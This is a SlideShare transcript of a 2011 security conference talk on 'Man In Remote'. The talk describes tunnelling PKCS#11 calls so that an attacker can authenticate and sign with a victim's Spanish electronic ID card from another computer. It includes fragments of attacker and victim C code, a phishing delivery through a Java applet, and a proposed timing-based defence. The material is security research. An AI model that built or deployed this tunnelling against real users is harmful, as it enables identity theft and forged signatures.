Your SlideShare is downloading. ×
HES2011 - Gabriel Gonzalez - Man In Remote PKCS11 for fun and non profit
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

HES2011 - Gabriel Gonzalez - Man In Remote PKCS11 for fun and non profit

1,621
views

Published on

Published in: Technology

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,621
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
73
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Remotely Using the Spanish National Electronic ID
  • 2. ToC• Introduction to DNIe• Man In Remote• Live Demo!• MiR Reloaded• Solution
  • 3. Introduction• Law to promote online transactions• Administrative Tasks Online• Citizen-Friendliness #fail
  • 4. Introduction• General Purpose Microprocessor• CriptoChip• Serial Port Communication
  • 5. Introduction• Biometric System: Match On Card• Authentication Certificates• Non-Repudiation Certificates• Component Certificates
  • 6. Introduction• PC / SC – Integration of SmartCards with PCs – API for Communication – Multiplataform – Functionality • Initialization • Readers Management • State • Sending/Receiving Command (APDUs)
  • 7. Introduction• Secure Channel – UNE 14890 – APDUs are encrypted – Peers mutually authenticated • Public Key Exchange • Authentication • Channel’s Key Derivation
  • 8. Introduction• CSP Applications – Microsoft Propossal CSP PC / SC – CryptoAPI Extensions DNIe Reader
  • 9. Introduction• PKCS#11 – RSA standard Applications (http://www.rsa.com/rsalabs/node.asp?id=2133) – Generic API to access crypto- PKCS#11 devices – Token as access unit PC / SC – Manages Several Objects DNIe • Public, Private Keys Reader • Data & Certs
  • 10. Introduction• Authenticating Users in Web Services – Java Applet • Intrusive method – SSL + Client Certificate • “Transparent”
  • 11. Introduction• Java Applet – User needs to download an Applet – Annoying Security Warnings
  • 12. IntroductionDNIe WebBrowser Web Server OCSP Init Session Get Client Cert Validate PIN Get Auth Cert Sign Msgs Validate Cert
  • 13. Introduction• Physhical Security – Power Sensors – Glitch Detection – Passivation Layer – Clock Frequency Changes Detection – Current Changes Detection• EAL4+ Level
  • 14. Man In Remote• Motivation• Definition• Description• Demo
  • 15. Man In Remote• Motivation – Systems using physical devices – Duplication – Remote Authentication
  • 16. Man In Remote• Definition Live usage of the functionalities provided by a security device when this is plugged into a different computer
  • 17. Man In Remote Web Browser PKCS#11
  • 18. Man In Remote WebBrowser PKCS#11 PKCS#11 PKCS#11 Tunneling MiR MiR
  • 19. Man In Remote WebBrowser PKCS#11 PKCS#11 PKCS#11 Tunneling MiR MiR
  • 20. Man In Remote• MiR - Attacker – Library interfacing with PKCS#11 – No Local Operations – Remote Object Interface
  • 21. Man In Remote• MiR - Attacker 1. Data Packaging 2. Method Invokation 3. Data Unpackaging
  • 22. Man In Remote• MiR - Victim – Client of the official PKCS#11 – Waits for Attaker’s Requests – Remote Object
  • 23. Man In Remote• MiR - Victim 1. Data Unpacking 2. Invoking Methods from the Official PKCS#11 3. Retrieve results and pack them back
  • 24. Man In Remote - Attacker’s SrcCK_DEFINE_FUNCTION(CK_RV,C_Initialize)(…){#ifdef _REMOTE_PKCS11_ { DataMarshalling *d = NULL; […] if (connect(client, (struct sockaddr *)&sock, sizeof(sock))== SOCKET_ERROR) {[…]} d = new DataMarshalling(client); d->setMsgType("C_Initialize"); d->packInt((char *)&a); d->sendData(); delete d; }
  • 25. Man In Remote - Attacker’s Src#else InicializarFunciones("UsrPKCS11.dll"); rv = pFunctionList->C_Initialize(pInitArgs);#endif#ifdef _DEBUG_PKCS11_ fprintf(fout, "C_Initialize ret: %dn", rv);#endifexit: return rv;}
  • 26. Man In Remote - Attacker’s SrcCK_DEFINE_FUNCTION(CK_RV,C_OpenSession)(){ CK_RV rv = CKR_OK; DataMarshalling *d = new DataMarshalling(client); d->setMsgType("C_OpenSession"); { /* * Open session */ unsigned int sessionId = 0; DataMarshalling *d2 = new DataMarshalling(client); d->packInt((char *)&slotID); d->packInt((char *)&flags); d->sendData();
  • 27. Man In Remote - Attacker’s Src d2->recvData(); if (strcmp(d2->getMsgType(), d->getMsgType())) { rv = CKR_CANCEL; goto exit; } rv = d2->unpackInt(); sessionId = d2->unpackInt(); delete d2; *phSession = sessionId; } delete d;exit: return rv;}
  • 28. Man In Remote - Victim’s Src} else if (!strcmp(d->getMsgType(), "C_OpenSession")) { slotId = d->unpackInt(); flags = d->unpackInt(); { DataMarshalling *d2 = new DataMarshalling(client); /* * Opening session */ ret = C_OpenSession(slotId, flags, NULL, NULL, &sessionId); d2->setMsgType(d->getMsgType()); d2->packInt((char *)&ret); d2->packInt((char *)&sessionId); d2->sendData(); delete d2; }}
  • 29. Man In Remote - Live Demo! Social Security WebBrowser PKCS#11 PKCS#11 PKCS#11 Tunneling MiR MiR
  • 30. Man In Remote• PKCS#11 Flow: InitializationC_Initialize C_OpenSessionC_GetInfo C_GenerateRandomC_GetSlotList C_SeedRandom C_FindObjectsInitC_GetSlotList C_FindObjectsC_GetSlotInfo C_FindObjectsFinalC_GetTokenInfo C_GetSlotInfoC_GetMechanismList C_GetSessionInfoC_GetMechanismList
  • 31. Man In Remote• PKCS#11 Flow: LoginC_FindObjectsInit C_GetSessionInfoC_FindObjects C_GetSessionInfoC_FindObjectsFinal C_FindObjectsInit C_FindObjectsC_GetSlotInfo C_FindObjectsFinalC_GetSessionInfo C_GetSlotInfoC_Login C_GetAttributeValueC_GetSlotInfo C_GetAttributeValueC_GetSessionInfo C_GetSessionInfo
  • 32. Man In Remote• PKCS#11 Flow: SigningC_SignInitC_SignC_GetSlotInfoC_CloseSessionC_GetSessionInfoC_GetSlotInfoC_GetSessionInfo
  • 33. Man In Remote• Dialog when using non-Repudiation Cert
  • 34. Man In Remote• Bypassing the dialog
  • 35. MiR Reloaded• Moving Victim’s part to a Java Applet• Security Warning
  • 36. MiR Reloaded• Java Version – Sun PKCS#11 – Easy distribution as Phishing Attack – iframe + applet
  • 37. MiR Reloaded• Till now we have achieve – Remote Authentication – Remote Signing – An Attacker with the PIN has full access to DNIe
  • 38. MiR Reloaded• Second method of Authentication: Applet – Token Signing – Signed Token Uploaded via POST – No need of PKCS#11 Tunneling – Send Token and Get it Signed
  • 39. MiR Reloaded Web Browser <form> <form> <input id=“token” <input id=“token” value=“AAAAAA”> value=“903234”> </form> </form>
  • 40. MiR Reloaded Web Browser<form><input id=“token” 1 Token Phishing /value=“903234”>value=“AAAAAA”> Trojan</form> 2 Signed Token
  • 41. MiR: Solution• Complex Solution• We can’t trust the PC• Servers can’t do any extra check• Smart Cards are not so “smart”
  • 42. MiR: Solution• Based on Response Times• Fixed Processing Times• Network Latency• DNIe could abort a potential attack
  • 43. MiR: Solution t R1 t R2 t p ( R1 ) tlocal t R1 Local Processing t R2 t p ( R1 )
  • 44. MiR: Solution t R1 t R2 t p ( R1 ) tlocal 2t RTT t R1 tRTT LocalProcessing MiR tRTT t R2 t p ( R1 )
  • 45. MiR: Solution t R1 t R2 t p ( R1 ) tlocal t R1 t R2 t p ( R1 ) tlocal 2t RTT t R1 t R2 t R1 t R2
  • 46. MiR: “Is this real Life?”• Similar Attacks – http://www.itworld.com/security/134958/smart- cards-no-match-online-spies